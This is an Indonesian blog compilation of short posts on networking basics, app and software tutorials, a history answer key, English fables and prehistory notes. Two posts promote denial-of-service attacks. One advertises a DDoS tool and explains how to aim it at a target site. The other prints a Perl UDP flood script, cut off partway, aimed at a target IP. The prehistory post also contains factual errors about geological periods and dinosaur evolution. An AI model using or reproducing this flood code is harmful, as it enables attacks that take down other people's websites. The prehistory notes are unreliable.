Pesan-pesan berukuran kecil, disebut paket, yang dikirimkan oleh suatu mesin akan diterima oleh mesin-mesin lainnya. Field alamat pada sebuah paket berisi keterangan tentang kepada siapa paket tersebut ditujukan. Saat menerima paket, mesin akan mencek field alamat. Bila paket terserbut ditujukan untuk dirinya, maka mesin akan memproses paket itu , bila paket ditujukan untuk mesin lainnya, mesin terserbut akan mengabaikannya.

Jaringan point-to-point terdiri dari beberapa koneksi pasangan individu dari mesin-mesin. Untuk mengirim paket dari sumber ke suatu tujuan, sebuah paket pad ajringan jenis ini mungkin harus melalui satu atau lebih mesin-mesin perantara. Seringkali harus melalui baynak route yang mungkin berbeda jaraknya. Karena itu algoritma rout memegang peranan penting pada jaringan point-to-point.

Pada umumnya jaringan yang lebih kecil dan terlokalisasi secara geografis cendurung memakai broadcasting, sedangkan jaringan yang lebih besar menggunakan point-to-point. Kriteria alternatif untuk mengklasifikasikan jaringan adalah didasarkan pada jaraknya. Tabel berikut ini menampilkan klasifikasi sistem multiprosesor berdasarkan ukuran-ukuran fisiknya.

Manfaat Jaringan Komputer | Sebelum membahas kita masalah-masalah teknis lebih mendalam lagi, perlu kiranya diperhatikan hal-hal yang membuat orang tertarik pada jaringan komputer dan untuk apa jaringan ini digunakan. Manfaat jaringan komputer bagi manusia dapat dikelompokkan pada jaringan untuk perusahaan, jaringan untuk umum, dan masalah sosial jaringan.

Terima kasih telah membaca artikel Macam Macam Jaringan Komputer
wisonirgmailcom Pendidikan, Teknologi

Pengertian Jaringan Komputer

Pengertian Jaringan Komputer adalah sebuah sistem yang terdiri atas komputer dan perangkat jaringan lainnya seperti: kabel, switch, HUB, router, dll yang bekerja bersama-sama untuk mencapai suatu tujuan yang sama. Tujuan dari jaringan komputer adalah :
  • Membagi fungsi sumber daya seperti berbagi pemakaian printer, CPU, RAM, harddisk
  • Komunikasi: contohnya surat elektronik, instant messaging, chatting - Akses informasi: contohnya web browsing.
Agar dapat mencapai tujuan yang sama, setiap bagian dari jaringan komputer meminta dan memberikan layanan (service). Pihak yang meminta layanan disebut klien (client) dan yang memberikan layanan disebut pelayan (server). Arsitektur ini disebut dengan sistem client-server, dan digunakan pada hampir seluruh aplikasi jaringan komputer.

Macam Macam Jaringan Komputer, Arti Jaringan Komputer, Pengertian Komputer

Adapun klasifikasi jaringan komputer berdasarkan skala antara lain :
  • Personal Area Network (PAN)
  • Campus Area Network (CAN)
  • Local Area Network (LAN)
  • Metropolitant Area Network (MAN)
  • Wide Area Network (WAN)
  • Global Area Network (GAN)

Berdasarkan fungsi : Pada dasarnya setiap jaringan komputer ada yang berfungsi sebagai client dan juga server. Tetapi ada jaringan yang memiliki komputer yang khusus didedikasikan sebagai server sedangkan yang lain sebagai client. Ada juga yang tidak memiliki komputer yang khusus berfungsi sebagai server saja.

Karena itu berdasarkan fungsinya maka ada dua jenis jaringan komputer:
  1. Client-server
  2. Peer-to-peer

1. Client-server
Yaitu jaringan komputer dengan komputer yang didedikasikan khusus sebagai server. Sebuah service/layanan bisa diberikan oleh sebuah komputer atau lebih. Contohnya adalah sebuah domain seperti www.detik.com yang dilayani oleh banyak komputer web server. Atau bisa juga banyak service/layanan yang diberikan oleh satu komputer. Contohnya adalah server jtk.polban.ac.id yang merupakan satu komputer dengan multi service yaitu mail server, web server, file server, database server dan lainnya.

2. Peer-to-peer
Yaitu jaringan komputer dimana setiap host dapat menjadi server dan juga menjadi client secara bersamaan. Contohnya dalam file sharing antar komputer di Jaringan Windows Network Neighbourhood ada 5 komputer (kita beri nama A,B,C,D dan E) yang memberi hak akses terhadap file yang dimilikinya. Pada satu saat A mengakses file share dari B bernama data_nilai.xls dan juga memberi akses file soal_uas.doc kepada C. Saat A mengakses file dari B maka A berfungsi sebagai client dan saat A memberi akses file kepada C maka A berfungsi sebagai server. Kedua fungsi itu dilakukan oleh A secara bersamaan maka jaringan seperti ini dinamakan peer to peer.

Sekian mengenai Pengertian Jaringan Komputer semoga bermanfaat ya.
wisonirgmailcom Pendidikan, Teknologi

Software Hemat Baterai - 2x Battery

Download 2x Battery - Battery Saver - Download Anda tidak perlu secara manual mengaktifkan / menonaktifkan koneksi internet lagi. Aplikasi ini memperpanjang hidup baterai dengan menggunakan algoritma pintar untuk mengaktifkan / menonaktifkan koneksi internet, kurangi pemakaian baterai dan penggunaan data, tapi masih menyimpan data latar belakang penting disinkronkan.
1. Auto mengelola koneksi 3G/4G/WiFi di latar belakang
2. Tampilkan tingkat baterai dan penggunaan dalam status bar
3. Efisien & mudah digunakan

Battery Saver - 2x Battery

Fitur :
  • Mengelola koneksi internet cerdas di latar belakang
  • Memastikan kelengkapan data transmisi dengan menjaga koneksi internet sampai pengiriman selesai
  • Modus Dukungan malam (PRO-only)
  • Dukungan whitelist. Jangan putuskan sambungan ketika aplikasi daftar putih berjalan
  • Otomatis mematikan layar saat Anda meletakkan telepon terbalik di atas meja atau ke dalam saku
  • Build-in filter layar untuk mengurangi kecerahan layar untuk menghemat baterai
  • Dukungan notifikasi terisi penuh dan peringatan baterai rendah
  • Baterai ikon tema yang berubah-ubah
  • Interval mengaktifkan dikonfigurasi dan pengaturan
  • Pilihan untuk menjaga hubungan saat pengisian atau penarikan
  • Pilihan untuk tidak mengaktifkan mobile data ketika layar terkunci
  • Menghormati pengaturan sistem
  • Putar suara setelah ketika layar atau menonaktifkan
  • Widget home screen
  • Tampilan penggunaan baterai dan waktu sejak terakhir dicabut, diperkirakan baterai kehabisan waktu, baterai status kesehatan, tegangan, suhu, dll Informasi
Sekian mengenai Software Hemat Baterai - 2x Battery.
wisonirgmailcom Android Apps, Software

Cara Install Antivirus Kaspersky Internet Security 2013

Selamat sore, hari ini kita akan bahas mengenai Tutorial Install Antivirus Kaspersky 2013 - How to Install Anti-Virus Kaspersky 2013. Cara Install Antivirus Kaspersky 2013 ini sangat mudah sekali. Bagaimana Cara Menginstall Antivirus Kaspersky Internet Security 2013? Kami ada solusinya, langsung saja

Pertama-tama anda dapat membeli CD Anti-Virus Kaspersky Internet Security 2013 yang asli ditoko komputer terdekat.
Langkah-langkah Cara Install Antivirus Kaspersky Internet Security 2013:

1. Masukkan CD Anti-Virus Kaspersky Internet Security 2013 anda
2. Setelah itu maka akan muncul seperti gambar berikut ini

Install Antivirus Kaspersky 2013

3. Setelah itu centang "I want to participate in Kaspersky Security Network (KSN) to provide optimal protection for my computer" Lalu Pilih "Install"

4. Lalu kita menunggu Proses Installing The Application kira-kira selama 5 menit

Install Antivirus Kaspersky 2013

5. Selanjutnya centang "Start Kaspersky Internet Security 2013" Lalu pilih "Finish"

Install Antivirus Kaspersky 2013

6. Lalu Enter Activation Code yang ada didalam kotak CD tersebut

Install Antivirus Kaspersky 2013

7. Setelah itu pilih Next

Install Antivirus Kaspersky 2013

8. Tekan Finish

Install Antivirus Kaspersky 2013

9. Akhirnya Antivirus anda sudah terpasang dengan benar dikomputer anda

Install Antivirus Kaspersky 2013

Sekian mengenai Cara Install Antivirus Kaspersky Internet Security 2013.
wisonirgmailcom Antivirus, Kaspersky, Tips, Trik

Kunci Jawaban Bab 1 LKS Sejarah Kelas X

Download Kunci Jawaban LKS Sejarah SMA Kelas X - Download Jawaban LKS Sejarah KTSP - Kunci Jawaban Sejarah Kelas X Semester 1 Hakikat dan Ruang Lingkup Ilmu Sejarah - Download Kunci Jawaban SMA LKS Sejarah Semester 2 Erlangga - Download Bab 1 Hakikat dan Ruang Lingkup Ilmu Sejarah - Ringkasan Mengenai Hakikat dan Ruang Lingkup Ilmu Sejarah.

Download Kunci Jawaban LKS Sejarah Kelas X

1. Kata sejarah di ambil dari kata Syajarah, berasal dari bahasa ...
a. Arab
b. Sansekerta
c. Kawi
d. Inggris
e. Belanda

2. Pengertian sejarah menurut J.V. Bryce adalah ...
a. pohon kehidupan manusia di masa lampau
b. catatan dari apa yang telah dipikirkan oleh manusia
c. catatan dari orang-orang yang terkenal pada zamannya
d. catatan dari apa yang telah dipikirkan dan dikatakan oleh manusia
e. catatan dari apa yang telah dipikirkan, dikatakan dan dilakukan oleh manusia.

3. Dalam bahasa Belanda sejarah diartikan sebagai sesuatu yang telah terjadi, dikenal dengan istilah ...
a. historie
b. geschichte
c. geschiedenis
d. geschehen
e. istoria

4. Kehidupan manusia dan arti kata sejarah ada hubungan erat mengenai ...
a. peristiwa yang hanya sekali terjadi
b. peristiwa yang terus menerus terjadi
c. proses yang terus menerus berlangsung
d. proses yang pertumbuhan yang berakhir masa kini
e. peristiwa yang pernah terjadi dan akan terjadi lagi

5. Peristiwa sejarah hanya sekali terjadi. Pernyataan ini menunjukkan sejarah merupakan peristiwa yang ...
a. penting
b. unik
c. abadi
d. sakral
e. utuh

6. Inti pengertian yang menyatakan bahwa sejarah adalah segala sesuatu yang telah dilakukan oleh manusia di masa lampau dikemukakan oleh ...
a. Nugroho Notosusanto
b. W.H. Walsh
c. Soekarno
d. Patrick Gardiner
e. J.V. Bryce

7. Apabila kita membuat sosiodrama tentang "Peristiwa Rengasdengklok" untuk dipresentasikan di depan kelas, termasuk ...
a. sejarah sebagai peristiwa
b. oral history
c. life history
d. sejarah sebagai kisah
e. sejarah ilmiah

8. Untuk mengungkapkan kehidupan manusia masa lampau, sejarah telah memformulasikan dalam lima pertanyaan. Salah satunya ialah where, yakni menunjuk kepada ...
a. tempat peristiwa terjadi
b. proses terjadinya peristiwa sejarah
c. waktu teradinya peristiwa sejarah
d. perisitwa yang terjadi pada masa lampau
e. adanya hubungan sebab akibat dalam peristiwa sejarah

9. Sejarawan dapat menyusun peristiwa-peristiwa masa lampau menjadi kisah yang menarik, berdasarkan ...
a. imajinasi si penulis
b. kritik dan interpretasi penulis
c. jejak-jejak yang ditinggalkan
d. ramalan para tokoh-tokoh sejarawan
e. sumber-sumber benda pada masa lalu

10. Menurut Sartono Kartodirdjo, dengan mempelajari seharah diharapkan ...
a. menghargai sejarah bangsanya
b. generasi muda cinta terhadap sejarah
c. generasi muda dapat mengambil hikmah dari pengalaman masa lampau
d. kebudayaan umat manusia dapat diwariskan kepada generasi muda
e. mengembangkan rasa cinta tanah air di kalangan generasi muda

11. Unsur-unsur sejarah berikut yang paling dapat memengaruhi perubahan ialah ...
a. unsur alam
b. unsur waktu
c. unsur ruang
d. unsur perilaku manusia
e. unsur lingkungan sosial

12. Pengajaran sejarah di sekolah-sekolah sangat penting, sebab dapat mendorong tumbuhnya semangat nasionalisme,. Hal ini termasuk manfaat sejarah memberi ...
a. pendidikan
b. pengajaran
c. kesadaran bangsa
d. ilham
e. hiburan

13. Pembatasan waktu dalam sejarah adalah penting dalam kesinambungan dimensi waktu yang lalu, sekarang, dan yang akan datang, sehingga ilmu sejarah mempelajarai segala peristiwa yang terjadi dalam waktu ...
a. waktu tertentu
b. waktu yang lalu
c. waktu sekarang
d. sepanjang waktu yang berkelanjutan
e. waktu yang lalu hingga sekarang

14. Peristiwa berurutan merupakan objek studi sejarah sebagai ilmu, karena ...
a. sejarah menitikberatkan urutan waktu sebagai pokok kajian
b. searah tidak lepas dari waktu sebagai pokok kajian
c. waktu merupakan unsur pokok dalam kajian sejarah
d. waktu dalam sejarah terdiri dari masa lalu, sekarang dan yang akan datang
e. waktu yang urut memudahkan belajar sejarah

15. Dasar penentuan pembabakan waktu dalam sejarah bervariasi, yakni dapat ditentukan oleh faktor-faktor kecuali ...
a. waktu
b. ruang
c. mistik
d. politik
e. ekonomi

16. Mempelajari sejarah berguna sebagia pesona perlawatan. Hal ini termasuk manfaat ...
a. memberi pelajaran
b. memberi pengajaran
c. memberi pendidikan
d. memberi ilham
e. memberi hiburan

17. Memahami sejarah sebagai adanya, dikenal dengan istilah
a. historie - recite
b. historie - precepite
c. historie - realite
d. historie - repete
e. historie - subjective

18. Pembabakan waktu dalam ilmu sejarah dikenal dengan nama ...
a. kronik
b. kronologi
c. periodisasi
d. pemaparan
e. interpretasi

19. Sejarah adalah catatan peristiwa-peristiwa penting dalam kehidupan manusia. Pernyataan ini menurut pendapat ...
a. Slamet Mulyana
b. J.V. Bryce
c. C.A. Beard
d. Hegel
e. W.H. Walsh

20. Kata yang berarti masa lampau ialah ...
a. sajaratun
b. syajaroh
c. istoria
d. story
e. history

  • Tulisan yang berlatar belakang warna hijau, jawaban yang benar
Jawaban Selanjutnya akan saya tulis tetapi tidak dengan opsi jawaban, tetapi jawabannya tetap benar

21. Ekspedisi Cornelis de Houtman berhasil mendarat di Banten pada thaun 1596. Pernyataan ini termasuk ...
a. Sejarah sebagai kisah

22. Peristiwa sejarah adalah peristiwa yang unik, maksudnya adalah ...
e. peristiwa yang hanya satu kali terjadi dan tidak pernah terulang

23. Peristiwa sejarah adalah peristiwa abadi, maksudnya adalah ...
e. peristiwa sejarah merupakan peristiwa yang tidak berubah-ubah dan tetap terkenang sepanjang masa

24. Sejarah sebagai peristiwa ialah sejarah kejadian, kenyataan. Moh. Ali menyebutnya sebagai ...
c. sejarah serba unik

25. Obyek kajian sejarah adalah
c. kejadikan di masa lalu yang merupakan sebab akibat

26. Kebenaran fakta dalam sejarah adalah obyektif. Maksud pernyataan tersebut adalah ...
e. fakta tidak boleh ditambah dan tidak boleh dikurangi, guna menyusun sejarah

27. Sejarah sebagai ilmu juga mempunyai teori-teori pada umunya berisi ...
d. kaidah-kaidah pokok suatu ilmu

28. Tujuan konsep periodisasi dalam sejarah adalah ...
c. mempermudah pemahaman sejarha

29. Perlawanan Pattimura menentang Belanda tahun 1817 merupakan sejarah sebagai sebuah ...
d. kisah

30. Dengan mempelajari sejarah generasi penerus dapat mengambil hikmah dan pelajaran dari pengalaman nenek moyangnya. Pernyataan ini dikemukakan oleh ...
d. Sartono Kartodirdjo

31. Mempelajari sejarah juga berguna untuk menumbuhkan semangat nasionalisme. Hal ini termasuk manfaat ...
d. memberi ilham

32. Fungsi pengajaran sejarah juga terlihat dari ungkapan dalam bahasa Latin "historia magistra vitae" yang artinya ...
d. sejarah pengalaman hidup

33. Maksud dari sejarah berkesinambungan adalah
d. peristiwa sejarah menyangkut masa lampau, masa kini dan masa yang akan datang

34. Berkaitan dengan waktu, mempelajari sejarah juga berguna untuk ...
b. memberikan kesadaran waktu

35. Ilmu sejarah berguna untuk memberikan pendidikan pada generasi penerus suatu bangsa. Hal ini merupakan guna ...
a. edukatif

36. Ilmu sejarah selalu mengikuti perkembangan gerak kemajuan manusia serta kebudayaannya. Hal ini menunjukkan bahwa ilmu sejarah bersifat ...
c. maju

37. Istilah histore realite mengandung pengertian ...
a. sejarah sebagaimana aslinya

38. Memahami sejarah dapat membuat manusia menjadi bijaksana dan membuka pintu kesabaran serta kritik yang dalam. Pernyataan ini menurut pendapat ...
c. Sir John  Seeley dan Mark Block.

39. Unsur ruang dalam mempelajari sejarah sangat penting, karena ...
b. manusia hidup dalam ruang

40. Belajar sejarah sangat besar manfaatnya bagi suatu bangsa, sebab ...
e. dapat dijadikan pedoman kehidupan suatu bangsa dalam menyongsong masa depannya.

Sekian mengenai Kunci Jawaban Bab 1 LKS Sejarah Kelas X.
wisonirgmailcom Kunci Jawaban, Pendidikan, Sejarah

Kumpulan Cerita Pendek Bahasa Inggris

Contoh Cerita Pendek Bahasa Inggris - Pada sore hari ini saya akann membahas mengenai Cerita Pendek yang biasa disebut CerpenKumpulan Cerpen Bahasa Inggris - Koleksi Cerpen Inggris - Cerita Pendek Binatang Bahasa Inggris Lengkap - Download Cerita Pendek Lengkap dengan Bahasa Inggris - Cerita Pendek Fabel - Contoh Teks Narrative Singkat Bahasa Inggris.  Cerpen adalah karangan atau sejenis karya sastra yang sangat singkat. Cerita Pendek Bahasa Inggris tentang Binatang yang dibawah ini juga sangat menarik seperti Mouse Deer and Crocodile. Cerita Pendek yang terdiri dari tokoh binatang atau biasa disebut Cerita Pendek Binatang disebut Fabel.

Mouse Deer and Crocodile
Teks Narrative Singkat Bahasa Inggris, Contoh Teks Cerpen Bahasa InggrisOne day, Mouse Deer went down to the river to take a drink. But he knew that the crocodile might be waiting underwater to eat him, so he said out loud. “I wonder if the water’s warm. I’ll put in my leg and find out.” Of course Mouse Deer didn’t put in his leg. He picked up a stick instead and put one end into the water. Chomp…! Crocodile grabbed the stick and pulled it underwater. Mouse Deer laughed. “Ha… ha…ha… Stupid crocodile! Cant you tell the difference between a stick and a leg?” Then Mouse Deer ran off to drink somewhere else.

In the next day, Mouse Deer wanted to cross the river. He wanted to eat the fruits on the other side of the river. He saw a floating log in the river. He knew that Crocodile looked like a log when he floated. Mouse Deer didn’t want to be eaten by Crocodile when he crosses the river. He had an idea. He called out loud, “Crocodile!” Crocodile rose from the water, “Hello, Mouse Deer. Have you come to be my lunch?” Mouse Deer smiled. “Sorry, not today, Crocodile. I have orders from the King. He wants to invite all the crocodiles in this river to a party. He wants me to count all the crocodiles so he could prepare enough meal for you.”

“Really…? Tell us what to do,” said Crocodile. “You must line up from this side of the river to the other side,” said Mouse Deer. Crocodile then got all his friends and family. They lined up across the river. Mouse Deer then jumped onto Crocodile’s back. “One,” he counted. He jumped onto the next crocodile, “Two.” And the next crocodile, “Three.” Mouse Deer kept jumping until he arrived on the other side of the river. “How many are there?” asked Crocodile. “Just enough,” said Mouse Deer. He laughed as he ran to the forest.***

Lake Toba
In the northern area of Sumatra Island, lived a young man. Everyday, he work hard as a farmer. One day in the morning, the young man went fishing in a river. Not so long after he threw the bait, it was bitten by a fish. He pulled the fishing rod and was amazed by the fish he caught. It was a golden fish. “Wait, please don’t eat me,” the fish suddenly spoke to the young man. Startled, the young man dropped the golden fish and it suddenly turned into a beautiful girl.

“I must have been dreaming,” the young man said to himself. “Don’t afraid, Sir. I was a princess cursed by the gods because a mistake I did. You’ve save me,” said the girl. “As my gratitude, I’m willing to be your wife.” The young man was so amazed to see the beauty of the girl, so he accepted her as his wife. They became man and wife but with one condition, the young man promised not to mention about the fish form of the girl. Terrible disaster will happen if the promise is broken.

A year passed, the young man and his wife already had a son. They were so happy. Their son grew up as a healthy boy. But he was a little naughty. He also had a habit, he was always hungry. One day, the wife asked their son to deliver lunch to his father. But, the son ate the food on his way to the fields. The father had been working since morning. He was so hungry. Finding that there’s no food left for him, he said angrily, “Stupid boy! You little fish boy!” He didn’t realize that he broke the promise.

After he said those words, his son and wife mysteriously disappeared. From their footstep on the ground, there’s water bursting out. The water kept coming out and started to flood the area. The whole village and the surrounding area became a lake. There’s a small island in the middle of the lake, known as Samosir Island. And the lake is known as Lake Toba. ***

Pak Lebai Malang
Pak Lebai was an old man living in a village by the river. Everyday, he used his sampan for travelling at the river. Pak Lebai had a bad habit. He always changed his mind before he did something. He was an inconsistent man. One day, Pak Lebai was invited to a party by his neighbor. Pak lebai was happy. He loved party because he could eat delicious food. He also could get a buffalo's head from the party. Still on the same day, he got another invitation. Those two party invitations made him confused. The two parties were held at the same time, but at different places. The two neighbors who invited him lived in different sides of the river. One neighbor lived on the east side and the other one lived in the west side. "If I go to the west side, I will only get one buffalo’s head. If I go to the east side, I can have two heads of buffalo. But the host at the west side is friendlier,” he said to himself. He was confused.

On the following day, Pak Lebai paddled his sampan to the party at the west side of the river. But then he changed his mind and went to the east side. On the way there, he met with some friends. "The party is awful. There are not many buffalo's heads," said one of them. So, Pak Lebai turned back his sampan again and went to the west side. Unfortunately, the party was already over when he arrived there. Pak Lebai immediately paddled his sampan to the east side again. But he also missed the party.


Pak Lebai was upset and blaming himself for being so inconsistent. He was so hungry and tired because he was padding back and forth in the river. He then fell asleep in his sampan. He did not realize that his sampan was drifting away at the river. When he woke up, he was already in the different village. That’s why all his neighbors started to call him Pak Lebai Malang (poor mister Lebai).***

Biwar and the Dragon
One day, the people from the village of Mimika were very busy. They prepared twelve boats and set off on a journey to find sago (traditional food of the people in the island of Papua). After three days, their boats were filled with sago. But on their way back to the village, they were attacked by a dragon. The dragon’s tail caused a big wave in the river. Most of the villagers were drown, but there’s a woman who managed to save herself. She was hanging to a tree log and finally arrives in a land.

The woman was the only survivor from the incident. She was pregnant. Her boat was broken so she couldn’t go back to the village. The woman then lived in the forest near the river. Later she gave birth to a son. She named her son Biwar. He grew up as a skillful hunter. He can make various weapons, set traps to catch animals, and provided sufficient food for both of them.

One day he brought some fish for their food. When his mother saw him bringing fish, she asked where Biwar got them. He said it was from the river. The mother was still afraid of the dragon, so she forbade Biwar to go near the river again. She also told him about his father and the villagers that were killed by the dragon, "Your father was killed by the dragon. I'm the only one survived from the incident. That's why we live alone here, Son."

Biwar then decided to hunt the dragon so that he and his mother could go back to the village. He set traps near the river. Then he made some noise by playing the tifa (traditional drums). Attracted by the noise, the dragon came to Biwar. When the dragon started to attack, Biwar pulled the rope that linked to his traps, releasing spears that hit the dragon’s head directly. The dragon died instantly.


Biwar then came to his mother and told her about the death of the dragon. The next day, he built a boat and set sail to return to the village. When they arrived in the village, all the people were so happy to hear the news about the dragon’s death. Thanks to Biwar, they are not afraid to sail in the river anymore.***

Sekian Artikel Kumpulan Cerita Pendek Bahasa Inggris. Semoga Contoh Cerita Pendek ini dapat bermanfaat bagi kita semua.
wisonirgmailcom Bahasa Inggris, Cerita, Pendidikan

Indonesian Subtitle Fast and Furious 6 CAM

Download Subtitle Fast and Furious 6 CAM Bahasa Indonesia - Film Fast and Furious ini sudah sangat mendunia, mulai dari yang pertama hingga yang terakhir dirilis. Dalam Film Fast and Furious 6 terdapat artis Indonesia yaitu Joe Taslim sebagai pemerannya. Indonesian Subtitle Fast and Furious 6 CAM - Fast and Furious 6 versi CAM - Subtitle Bahasa Indonesia Fast and Furious 6.

Fast and Furious 6 versi CAM, Fast and Furious 6 Indonesian Subtitle



Semoga Indonesian Subtitle Fast and Furious 6 CAM dapat bermanfaat.
wisonirgmailcom Film, Subtitle

Download Zombie DDOS Attack

Zombie DDOS Attack Terbaru 2013 - Kali ini akan dibahas mengenai Hacking/DDOS. Kegiatan DDOS merupakan kegiatan hacking dengan cara membanjiri lalu lintas sebuah server website. Cara menggunakan Zombie DDOS Attack juga sangat mudah.
  • Insert-Server-Target itu diisi dengan target website yang akan di DDOS
  • IP Host itu diisi dengan IP dari target website
Kegiatan DDOS sudah banyak sekali terjadi, apalagi ditahun-tahun 2013 ini Indonesia sedang menghadapi ancaman serangan Deface dari negara Myanmar. Jadi untuk itu saya membahas mengenai Aplikasi DDOS yang sangat sederhana tetapi bermanfaat. Aplikasi ini dibuat oleh 3 orang programmer, yaitu :
  1. c0d334rl 
  2. Qye
  3. punisher404
Mereka merupakan dari Team Hacking SC4N-X T34M / IBT-SUMBAR. Jika ingin target DDOS cepat down anda dapat membuka Aplikasi ini sebanyak-banyaknya.

Tampilan dari Zombie DDOS Attack :

Tampilan Zombie DDOS Attack


Sebelumnya saya juga pernah membahas mengenai Hacking, atau kegiatan DDOS juga yaitu Perl.
Semoga artikel Download Zombie DDOS Attack bermanfaat bagi kita semua.
wisonirgmailcom DDOS, Hack

Sejarah Awal Kehidupan Manusia di Bumi

Kehidupan Awal Masyarakat Indonesia Sejarah Kelas X - Awal Kehidupan Manusia di Bumi ini sudah sangat lama. Kehidupan masyarakat pada berburu dan mengumpulkan makanan masih sangat sederhana. Masa ini disebut masa food gathering (mencari dan mengumpulkan makanan) dengan sistem hidup berpindah-pindah (nomaden). Manusia purba telah menghasilkan kebudayaan secara sederhana dengan menciptakan alat-alat untuk menangkap binatang buruan, menguliti binatang buruan, mengorek ubi-ubian, mengail ikan dari bahan-bahan seperti batu, kayu, tulang, tanduk, binatang, dan sebagainya.

Sejarah Kelas X

Sejarah Kehidupan Masyarakat di Bumi - Kemudian manusia prasejarah berkembang dengan mulai mengenal tempat tinggal sementara (semi sedenter), misalnya di tepi pantai atau di gua-gua. Sisa-sisa peninggalan hidup tempat tinggal sementara dari zaman Mesolitikum ini antara lain kyokkemoddinger (sampah dapur) dan abris sous roche (gua sebagai tempat tinggal). Alat-alat kehidupan merekapun makin berkembang, seperti chooper (kapak perimbas/pebble/kapak Sumatra), chopping tool (kapak penetak), anak panah, flake, alat-alat dari tulang dan tanduk rusa dan sebagainya. Kehidupan manusia purba pada masa menetap dan bercocok tanam berlangsung pada zaman Neolitikum.

Zaman Sejarah dan Prasejarah di Indonesia - 4 Zaman Sejarah Indonesia - Sejarah Proses Pembentukan Bumi :
1. Zaman arkhaikum : Belum ada kehidupan disebabkan bumi masih panas & merupakan bola gas panas yang berputar pada porosnya

2. Zaman paleozoikum :
  • Zaman ketika terdapat kehidupan makhluk pertama di bumi
  • Disebut juga zaman primer (karena untuk pertama kalinya ada kehidupan)
  • Terbagi menjadi beberapa tahap kehidupan :
  1. Cambrium : Kehidupan amat primitif seperti kerang dan ubur-ubur
  2. Silur : Hewan bertulang belakang seperti ikan
  3. Devon : Binatang jenis amfibi tertua
  4. Carbon : Binatang merayap jenis reptil
  5. Perm : Hewan darat, ikan air tawar dan amfibi

3. Zaman mesozoikum :
  • Zaman sekunder (zaman hidup kedua), disebut juga zaman reptil sebab muncul reptil besar seperti dinosaurus dan atlantosaurus
  • Terbagi menjadi 3 :
  1. Trias : Ikan, amfibi dan reptil
  2. Jura : Reptil dan sebangsa katak
  3. Calcium : Burung pertama dan tumbuhan berbunga
  • Ikan di darat mengalami evolusi, siripnya menjadi kaki yang kuat, ekornya tumbuh semakin panjang, kepalanya yang semakin keras dan besar. Inilah yang kita kenal dengan nama dinosaurus, brontosaurus dan atlantosaurus
  • Dinosaurus pemakan tumbuhan kecuali Tyranosaurus
  • Brontosaurus besarnya 10x gajah
  • Reptil terbang seperti Pteranodon

4. Zaman neozoikum :
  • Zaman bumi baru (bumi sudah terbentuk sepenuhnya)
  • Terbagi menjadi :
  1. Zaman tertier : Zaman hidup ketiga, makhluh hidup berupa binatang menyusui sejenis monyet & kera, reptil raksasa mulai lenyap, dan pada akhir zaman ini sudah ada jenis kera-manusia. Zaman ini ditandai dengan munculnya tenaga endogen yang dahsyat sehingga mematahkan kulit bumi
  2. Zaman kuarter : Zaman hidup keempat, mulai muncul kehidupan manusia.
Dibedakan menjadi :
  • Zaman pleistosen (Diluvium) : Terjadi penurunan suhu drastis dan memunculkan zaman es (zaman glasial)
  • Zaman holosen (Aluvium) : Zaman lahirnya jenis Homo Sapiens, yaitu jenis manusia seperti manusia sekarang
Semoga artikel Sejarah Awal Kehidupan Manusia di Bumi yang dapat kami berikan ini bermanfaat bagi kita semua. 
wisonirgmailcom Pendidikan, Sejarah

Cara Convert 3D to 2D

Kali ini kita bahas Cara Convert Video 3D menjadi Video 2D. Sebelumnya saya ada permasalahan mengenai Film yang saya download berupa 3D. Tampilan layar menjadi double kiri dan kanan. Saya cari-cari cara untuk mengubah Video 3D menjadi Video 2D dan akhirnya ketemu. Cara Mengubah Video 3D to Video 2D menggunakan Avidemux.

Gambar dibawah ini menunjukkan Video Chinese Zodiac 3D

Video 3D Chinese Zodiac

Terlihat diatas bahwa Video tersebut menjadi double layar.

Cara Mengatasi Video tersebut akan dibahas dibawah ini.

Cara Convert 3D to 2D :
1. Pertama Download terlebih dahulu Software Avidemux
2. Setelah Software berhasil didownload, buka Avidemux.

Software Avidemux

3. Pilih File lalu Open Video 3D yang akan kita convert ke 2D, disini saya mengambil contoh Video Chinese Zodiac 3D
4. Settingan nya sebagai berikut :
  • Video Output : Mpeg4 AVC (x264)
  • Audio Output : AC3 (lav)
  • Output Format : Mkx Muxer
Gambar 1


5. Pilih Filter dibagian Video Output

Gambar 2

6. Setelah itu muncul Tab Video Filter Manager, lalu pilih swsResize

Gambar 3

7. Selanjutnya Edit swsResize menjadi seperti berikut ini, dan pilih OK

Gambar 4

  • Source 1:1
  • Destination 16:9

8. Lalu selanjutnya Pilih Crop

Gambar 5

9. Dan Terakhir Setting Left menjadi 640 Lalu Ok

Gambar 6

10. Dan Coba di Preview, dan Berhasil

Sekian mengenai Tutorial Cara Convert 3D menjadi 2D.
wisonirgmailcom Software, Tips, Trik

Contoh Script Perl Untuk DDOS

Download Script Perl DDOS - Kumpulan Script Perl DDOS - Kumpulan Software DDOS Online - Kali ini Info Online akan membagi pengetahuan di bidang Hacking. Perl adalah suatu software yang digunakan untuk menyerang otomatis ke sebuah target website dengan membanjiri lalu lintas pengunjung website tersebut.

Perl DDOS

Perl for Windows 32 Bit :

Perl for Windows 64 Bit :

Script Perl untuk DDOS :

    #!/usr/bin/perl START SCRIPT
   
print q{

};

    use Socket;
    use strict;
   
    my ($ip) = "IP Target";
    my ($port) = 0;
    my ($size) = 0;
    my ($time) = 0;
   
    my ($iaddr,$endtime,$psize,$pport);
   
    $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
    $endtime = time() + ($time ? $time : 1000000);
   
    socket(flood, PF_INET, SOCK_DGRAM, 17);
   
   
    print "Flooding $ip " . ($port ? $port : "random") . " port with " .
      ($size ? "$size-byte" : "random size") . " packets" .
      ($time ? " for $time seconds" : "") . "\n";
   

    for (;time() <= $endtime;) {
      $psize = $size ? $size : int(rand(1024-64)+64) ;
      $pport = $port ? $port : int(rand(65500))+1;
   
